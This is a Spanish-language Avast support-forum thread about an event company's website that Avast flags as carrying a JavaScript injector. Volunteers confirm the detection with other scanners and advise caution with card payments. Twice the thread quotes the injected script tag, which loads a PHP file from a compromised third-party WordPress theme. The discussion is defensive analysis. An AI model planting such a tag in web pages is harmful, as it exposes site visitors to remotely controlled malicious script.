Falso Positivo en página web

[REDACTED]

Hola, les participo que el sitio web hxxp://areeeipaslonga.com/index.html está siendo bloqueado por error, tengo 2 equipos uno con Avast y el otro con Eset, el equipo con Avast al entrar al intentar acceder al sitio lo bloquea y dice detectar un Jsinjector trojan, mi otro equipo con Eset no detecta problema alguno y se puede navegar sin problemas dentro de la página, por favor hacer chequeo y corregir posible equivocación de Avast porque ya en casa y los equipos del trabajo hemos tenido varios problemas con Avast y lo estamos reemplazando, hay problemas con detecciones erróneas y malware no detectado.

[REDACTED]

Eso no es lo que dicen otros analizadores:

https://sitecheck.sucuri.net/results/areeeipaslonga.com/
https://www.yandex.com/infected?url=areeeipaslonga.com&l10n=en&redircnt=1437267570.1
http://zulu.zscaler.com/submission/show/689a12c7eb4bac8868572b7038f6edaa-1437267698
http://quttera.com/detailed_report/areeeipaslonga.com

Ninguno de los voluntarios analizadores de sitios web esta en el foro ahora para indicarles que hagan un analisis mas a fondo. Asi que cuando hay resultados contradictorios lo mejor es reportar el sitio a los laboratorios de virus de Avast como F/P y dejar que ellos decidan: https://support.avast.com/

[REDACTED]

Eso no es lo que dicen otros analizadores:

https://sitecheck.sucuri.net/results/areeeipaslonga.com/
https://www.yandex.com/infected?url=areeeipaslonga.com&l10n=en&redircnt=1437267570.1
http://zulu.zscaler.com/submission/show/689a12c7eb4bac8868572b7038f6edaa-1437267698
http://quttera.com/detailed_report/areeeipaslonga.com

Ninguno de los voluntarios analizadores de sitios web esta en el foro ahora para indicarles que hagan un analisis mas a fondo. Asi que cuando hay resultados contradictorios lo mejor es reportar el sitio a los laboratorios de virus de Avast como F/P y dejar que ellos decidan: https://support.avast.com/

Bueno esa es mi intención porque esa página la visitamos hoy en casa ya que vamos a organizar un evento social y contrataremos los servicios de esa gente, en el equipo con Avast el portal es bloqueado por lo que tuve que acceder con el otro para enviar un e-mail a esa gente para contratarlos, son de Caracas una compañía que ofrece un servicio y no creo que ellos estén metiendole virus a la gente que visita su web sino imaginate nadie confiaría en ellos.

Si las personas a las que les corresponde corregir ese F/P analizan la URL y la sacan de la lista negra ok si no entonces desactivaré Avast para acceder al sitio para contratarlos porque ya analicé con Malwarebytes y no hay ningún problema pero bueno......tu tienes más experiencia en esto no se que decir, estoy que instalo Avast en esta y escaneo full el sistema, ya me pusiste a pensar  .......bueno.........ya le doy un scan no creo que sea tan grave.

[REDACTED]

Un analizta me informo que el sitio tiene muchos errores de mantenimiento y ha estado hacked muchas veces. otros analizadores que el uso detectan muchos problemas.

Si tienes que usarlo hazlo sandboxed y si tienes que pagar algo con tarjeta, bueno... solo cruza los dedos.


Lo que me mando Polonus:

Site has excessive server header info proliferation, he should take that usp with Netrouting abue to be better configured, WP theme may has base64 code injected into the WP theme ->[[<!--948992--><script type="text/javascript" src="http://borta-arts.com/wp-content/themes/twentyfourteen/yzhy9b7w.php?id=34988"></script><!--/948992-->]]
 Site now won't resolve properly, 31 sites on IP, IP with issues.
Server: Apache/2.2.29 (Unix) mod_ssl/2.2.29 OpenSSL/1.0.1e-fips DAV/2 mod_jk/1.2.37 mod_bwlimited/1.4
Re: https://www.virustotal.com/nl/ip-address/162.252.58.70/information/ Query terms are ambiguous. The query is assumed to be:
# "n 162.252.58.70"
#
# Use "?" to get help.
#

#
# The following results may also be obtained via:
# http://whois.arin.net/rest/nets;q=162.252.58.70?showDetails=true&showARIN=false&showNonArinTopLevelNet=false&ext=netref2
#

Netrouting Inc. NETROUTING-INC (NET-162-252-56-0-1) 162.252.56.0 - 162.252.59.255
StartPower STARTPOWER-BY-NETROUTING-MIAMI (NET-162-252-58-0-1) 162.252.58.0 - 162.252.58.255

No preguntes porque solo se la mitad, pero el problema es las redirecciones de IP y un codigo injected que debe de ser lo que Avast detecta.

[REDACTED]

Hola amigos!!

Bueno, el hecho de que esa web esté infectada, no quiere decir que el dueño de esa web o la persona que mantiene la web, la haya infectado, muchas veces son webs hackeadas y los dueños ni siquiera lo saben.

Por otro lado, digo lo mismo que Iroc, cruzá los dedos, a mi me han estafado una vez con servicios de internet, de la noche a la mañana me dejaron completamente sin acceso a mi shell, sin ningún tipo de explicación, intenté hablar con el dueño ya que es el único dueño, y jamás me respondió ni los mails que le mandé, ni tampoco en el facebook, justo ese día le envié $ 100 pesos argentinos para pagar un mes más por sus servicios y nunca más los tube, me cambió la clave de la cuenta y lógicamente era él, no puede ser otro, le pedí explicaciones por todos lados, hasta incluso hablé con un amigo de él para que le informara lo que pasó y nada, no pude hacer nada, así que perdí todo, la web, el foro, todo por culpa de ese estafador.

Cuando el me dejó sin acceso, yo no pude hacer un backup de mi cuenta, como puedo saber que me iba a estafar así, así que lo que hice que gracias a Dios en ese tiempo SMF (plataforma de foro que uso), tenía para descargar en su panel de admin, la base de datos, sino tenía esa posibildiad, perdía el foro, es cierto que yo hacía copias, pero bueno no tenía ninguna reciente, además de que no es nada recomendable descargar la base de datos del foro por medio del mismo foro, ya que después para importarla da muchos problemas, por eso en la última versión de SMF 2.1 han removido esa opción, además de ser un inmenso riesgo de seguridad.

Yo no confiaría en esa gente, hay muuuuuuchos estafadores como ese Emmanuel Arreguez que me estafó a mi, si pagas algo y te estafan, no vas a tener forma de recuperar tu dinero, al menos en mi caso, era imposible recuperarlo y perdí mal, hasta los $100 que le envié esa persona.

Saludos!!

[REDACTED]

Cuando dije que cruce los dedos no lo dije por los propietarios del sitio sino porque no sabemos si esta infectado o no a ciencia cierta. Ese script injectado que supuestamente es una redireccion puede haber sido un hack o solo una programacion mal hecha.

Tu, Principe_Azul, podrias averiguar ya que ese es tu area de experiencia.

[REDACTED]

Pero se podría bajar ese script y analizarlo, bueno yo no se de javascript, pero podría preguntar en un foro de programación en el que ando, para pedirles que me digan si es un script malicioso o no.

Tu, Principe_Azul, podrias averiguar ya que ese es tu area de experiencia.

La verdad no sé como saber eso, ya que lo que a mi me pasó fué algo extraño, ya que el dueño de esa supuesta empresa que no es ninguna empresa, sino es un persona que compra un servidor dedicado y vende las máquinas de ese servidor y hace creer a los demás que tiene una gran empresa, yo fuí cliente de él por 2 años masomenos y me hizo eso de la nada.
Además esta persona es impresionante como lo atacan, y al atacarlo a él, yo y todos los clientes de él, salíamos perjudicados, tiene muchos enemigos... y por algo es.

No sé en que podría colaborar, ya que no es lo mío, yo solamente le dije que yo en su lugar no confiaría porque hay muchos estafadores y que si el paga, quizás no le dan nada, pero puede que quizás si, no sé.
Lo que se podría hacer, es comentarle al dueño del sitio que tiene un script malicioso en su web y que verifique qué es para que lo pueda corregir, ya que el antivirus Avast! detecta que en su sitio hay un script malicioso, y bueno que el dueño vea que va a hacer, yo no puedo hacer nada porque nisiquiera conozco esa web, además si ese sitio fué hackeado varias veces, si el mismo dueño no hace nada para mejorar la seguridad, no creo que se pueda hacer mucho.

blogtecnologia amigo, cuál es el archivo que te está diciendo Avast! que es malicioso? Así lo bajo y voy a preguntar si es malicioso o no.

Saludos!!!

[REDACTED]

@ Principe_Azul

Si abres el enlace de Sucuri https://sitecheck.sucuri.net/results/areeeipaslonga.com/

a la mitad de la pagina estan los iframe detectados.

Si abres el enlace de Quttera http://quttera.com/detailed_report/areeeipaslonga.com

y pinchas sobre la pestaña que dice Scanned files analysis veras en la lista Malicious files: 5 . Ahi esta el codigo por el sitio /index.html. solo tienes que pinchar donde dice View code ver imagen

Ten encuenta que esa no es solo la unica pagina con un codigo sospechoso. Sucuri detecta 3 y Quttera detecta 5 paginas diferentes.

mas los codigos que encontro Polonus que son ambigous.

WP theme may has base64 code injected into the WP theme ->[[<!--948992--><script type="text/javascript" src="http://borta-arts.com/wp-content/themes/twentyfourteen/yzhy9b7w.php?id=34988"></script><!--/948992-->]]

[REDACTED]

Son varios los archivos que detectan que están mal programados o infectados, así que la verdad poco se puede hacer.

[REDACTED]

Entonces que es lo recomendable? que no contrate a esa gente?, bueno avisaré a mi familiar para que no realice ningún pago y que nos busquemos a otra empresa para hacer lo del evento, en cuanto a la página puedo enviarles capturas de pantalla a ellos ahora si ellos no hacen nada al respecto ya ese es su problema.

Gracias a ambos por su ayuda!

[REDACTED]

¿ Mandastes el reporte a Avast ?

Bueno, si la empresa es local, contactalas directamente ( telefono o en persona ) y paga directamente, o depositas en la cuenta de un banco.

No estamos diciendo que ellos no son de fiar. Estamos diciendo que su sitio web no es de fiar. Son dos cosas muy diferentes. Puede que tengan un web master mediocre y no mantenga correctamente el sitio, o puede que de verdad estan hackeados por un tercero y ahi esta el problema para tu sistema, o tu tarjeta de credito, o debito.

[REDACTED]

Exactamente, tál como dijo Iroc, hoy en día están robando mucho dinero en tarjetas de crédito, nosotros solo te informamos lo que puede pasar, no es que vaya a pasar si o si, sino que puede que el dueño de esa web no sepa que está en peligro su web, si es que está infectada cláro.

Nosotros solo te advertimos, pero es tu desición amigo, puede que los dueños de esa web son excelentes personas pero si está hackeada su web, será un gran problema que vas a tener.

[REDACTED]

¿ Mandastes el reporte a Avast ?

Bueno, si la empresa es local, contactalas directamente ( telefono o en persona ) y paga directamente, o depositas en la cuenta de un banco.

No estamos diciendo que ellos no son de fiar. Estamos diciendo que su sitio web no es de fiar. Son dos cosas muy diferentes. Puede que tengan un web master mediocre y no mantenga correctamente el sitio, o puede que de verdad estan hackeados por un tercero y ahi esta el problema para tu sistema, o tu tarjeta de credito, o debito.

Te comprendo Iroc9555 y tienes razón, informaré a mi familiar que pague con cheque directamente en la sede donde atienden y que no introduzca ningún dato de tarjetas de crédito, de igual modo advertiré a la gente que tiene esa página que tienen un problema con su sitio web y que deben corregirlo. Ya les envié un e-mail a la gente de arreipas para que su webmaster corrija el problema.

Agradezco la orientación y los consejos que me han dado, ustedes evidentemente saben más de informática que yo y este foro me está brindando un excelente soporte como pocos saben brindarlo por eso uso Avast porque tengo una duda o un problema y me ayudan.

Gracias a todos.

Principe Azul es este:

[REDACTED]

Amigo Iroc me pasó lo mismo que a vos, escribí todo y al pulsar Publicar, se borró todo, deben arreglar eso....

Vuelvo otra vez a escribir lo mismo......
No se olviden que cada post que hagan, abran un Bloc de notas y ANTES de publicar COPIEN todo el contenido de la caja de edicón y pegen ese contenido en el bloc de notas, ya que si les pasa lo que me acaba de pasar a mí a y muchos, van a tener que escribir todo de nuevo... encima este foro no usa caché.

Bueno, lo que había escrito es que estube chequeando los archivos iframes en javascript que son los maliciosos, los enlaces de los mismos los saqué de las webs que dejó el amigo Iroc.

He estado comprobando con un script en Python los enlaces maliciosos, todos los enlaces devuelven un error 301, o sea Moved permanently/Movido permanente, es decir que al intentar entrar en ellos, me redirigen a otra web, o sea a esta:

/wp-content/themes/twentyfourteen/yzhy9b7w.php?id=34992

que también me devuelve el código de estado 404 (Not found), por lo tanto no existe....
Aunque si hechamos 1 ojo a este archivo:

yzhy9b7w.php

eso si es muy sospechoso, ya que el archivo tiene un nombre bastante raro y sin sentido, letras aleatorias y 2 numeros, he intentado entrar en él, pero no existe.
Lo más probable es que sean archivos temporales, a modo de comentario, yo mirando varias veces el Log de apache de mi foro, he encontrado varias peticiones maliciosas que intentaban realizar un tipo de ataque para bajar algo de una URL, ejecutarlo en mi VPS y luego borrarlo para no dejar rastros, estos archivos eran en Perl, Python y Bash, al ver eso he intentado entrar en esas direcciones, que solamente era una IP con un puerto extraño, pero el archivo ya no existía, simplemente porque son temporales, lo usan para fines malos y luego lo borran.

Lo bueno de hacer las pruebas con estos scripts en Python (en mi caso) o en otro lenguaje, es que lo vas a hacer de una forma totalmente segura, ya que en esos scripts/programas no existe Java, ni Flash, ni jQuery, ni Javascript, etc., simplemente estos programas reciben los datos tál como los reciben nuestros navegadores, a diferencia que no van a ejecutar ningún código, y los datos HTML o javascript o lo que sea, se pueden guardar en archivos en formato .txt por ejemplo, de esa forma, se puede trabajar totalmente seguro, además se puede configurar todo, como el User-Agent y muchos otros datos más.

Conclusión, los archivos que supuestamente están infectados solo devuelven errores 301 y 404 (solo probé con varios, no todos), pero como dije, puede que esos archivos sean temporales, al ingresar a la web, se crean y luego se borran al pasar cierto tiempo, hay muchas cosas que son automáticas.

Saludos!!!!

[REDACTED]

Yo ya envié el aviso a la gente de Areeipas, hicieron caso omiso al mail, allá ellos yo procuro no entrar a esa página por seguridad.